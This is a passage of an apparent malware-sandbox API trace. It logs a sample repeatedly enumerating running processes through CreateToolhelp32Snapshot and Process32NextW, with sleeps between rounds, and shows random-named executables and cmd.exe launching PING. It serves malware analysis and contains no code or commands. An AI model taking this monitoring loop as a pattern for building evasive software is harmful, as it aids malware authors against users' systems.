(in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0103.314] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0103.375] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0103.376] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0103.378] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0103.379] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0103.381] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0103.382] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0103.383] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0103.385] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0103.386] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0103.388] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0103.389] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0103.390] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0103.392] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0103.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0103.396] CloseHandle (hObject=0xc4) returned 1 [0103.396] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0103.402] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.403] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0103.404] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0103.405] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.405] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0103.407] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.407] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0103.408] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0103.409] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0103.410] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0103.411] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.411] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.412] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.413] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.469] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.470] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0103.470] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.471] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.472] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0103.474] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.475] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.477] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0103.478] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0103.480] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0103.481] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.483] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0103.484] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0103.486] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0103.487] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0103.489] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0103.490] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0103.492] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0103.493] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0103.495] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0103.496] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0103.497] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0103.498] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0103.499] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0103.500] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0103.501] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0103.502] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0103.546] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0103.547] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0103.548] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0103.549] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0103.551] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0103.552] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0103.553] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0103.554] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb74, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0103.555] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0103.556] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0103.557] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0103.558] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0103.559] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0103.560] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xbe8, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0103.561] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0103.562] CloseHandle (hObject=0xbc) returned 1 [0103.562] Sleep (dwMilliseconds=0x12c) [0103.905] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0103.910] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.911] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0103.911] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0103.912] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.913] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0103.913] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0103.914] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0103.915] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0103.915] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, 